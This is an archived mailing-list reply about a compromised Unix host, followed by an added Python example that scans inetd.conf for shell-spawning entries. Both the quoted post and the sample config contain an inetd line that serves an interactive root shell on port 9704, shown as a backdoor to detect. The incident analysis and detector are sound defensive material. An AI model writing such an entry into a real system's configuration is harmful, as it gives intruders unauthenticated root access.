Security Incidents mailing list archives

Re: Possible widespread hole?


From: An Thi-Nguyen Le <viper () SRH1003 URH UIUC EDU>
Date: Sun, 27 Aug 2000 01:17:51 -0500

On Sat, Aug 26, 2000 at 06:07:32PM -0000, c_patin () HOTMAIL COM typed:
}       I was snooping around my box yesterday, and noticed the
} following MAJOR hole listed at the bottom of
} /etc/inetd.conf:
} 9704 stream tcp nowait root /bin/sh sh -i

You were hacked.


} I have since closed the hole, and placed my box behind a
} hardware firewall to protect it. But the interesting thing
} is that I was reading Slashdot a little while ago and
} mentioned this in an article about security. And someone
} else had the same exact hole listed inside of his
} /etc/inetd.conf. Is this possibly some major hole in a
} package that we both installed, or did we just get hacked by
} the same person? Seems a little weird to just be
} coincidence. Any advice or ideas?

You were hacked.  No doubts about it.  Someone put that
backdoor in your inetd.conf to make sure they could get back
in, should you close the original hole they hacked through.
In fact, they're probably running their own version of inetd
and have hacked up ps and netstat so that you can't tell.

Whatever distribution you have, make sure your
packages/programs/whatnot are all updated to non-vulnerable
versions.  A default RedHat install of any kind, for instance,
is very, very wide open.

As your machine has been hacked, I would suggest a *complete*
reinstall of your operating system, unless you feel like
wondering whether your binaries are trojaned or not, which
they probably are.


--
An Thi-Nguyen Le
|Help me, I'm a prisoner in a Fortune cookie file!

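The entry quoted above (`9704 stream tcp nowait root /bin/sh sh -i`) is easy to spot by hand once you know what to look for; the following added example, which is not code from the original post, shows how a defender can parse a classic inetd.conf and flag entries whose server program is a shell interpreter, runs as root, or is keyed on a bare port number instead of a service name. The sample config is constructed and the `InetdEntry`, `parse_inetd_conf` and `suspicious_entries` names are this example's own.

```python
"""Flag inetd.conf entries that hand out a shell (added example, not code
from the original post). The sample config is constructed; its last line
is the backdoor entry quoted in the thread. Assumes the classic layout:
  service socktype proto wait/nowait user server-program [args...]
"""
from collections import namedtuple

SHELLS = {"sh", "bash", "csh", "ksh", "tcsh", "zsh", "dash"}

SAMPLE_INETD_CONF = """\
# constructed sample inetd.conf
ftp     stream  tcp  nowait  root    /usr/sbin/tcpd  in.ftpd -l -a
telnet  stream  tcp  nowait  root    /usr/sbin/tcpd  in.telnetd
finger  stream  tcp  nowait  nobody  /usr/sbin/tcpd  in.fingerd
9704 stream tcp nowait root /bin/sh sh -i
"""

# One parsed entry: service name (or bare port), socket type, protocol,
# wait/nowait, user, server program path (or "internal"), argument list.
InetdEntry = namedtuple("InetdEntry",
                        "service socktype proto wait user program args")

def parse_inetd_conf(text):
    """Parse inetd.conf text into InetdEntry tuples; skip comments/blanks."""
    entries = []
    for raw in text.splitlines():
        fields = raw.split("#", 1)[0].split()
        if len(fields) < 6:
            continue  # blank or malformed: inetd would not serve it
        entries.append(InetdEntry(*fields[:6], fields[6:]))
    return entries

def suspicious_entries(text):
    """Return (entry, reasons) pairs for entries an analyst should look at."""
    findings = []
    for e in parse_inetd_conf(text):
        reasons = []
        if e.program.rsplit("/", 1)[-1] in SHELLS:
            reasons.append("server program is a shell interpreter")
            if "-i" in e.args:
                reasons.append("started with -i (interactive)")
            if e.user == "root":
                reasons.append("runs as root")
        if e.service.isdigit():
            reasons.append("bare port number instead of a service name")
        if reasons:
            findings.append((e, reasons))
    return findings
```

On a host that is already compromised, the inetd.conf you read and the inetd binary actually running may not be the ones in use, for the same reason the reply distrusts `ps` and `netstat`; run a check like this from a known-clean system or rescue media, and treat a hit as confirmation of the reinstall advice rather than as something to clean up in place.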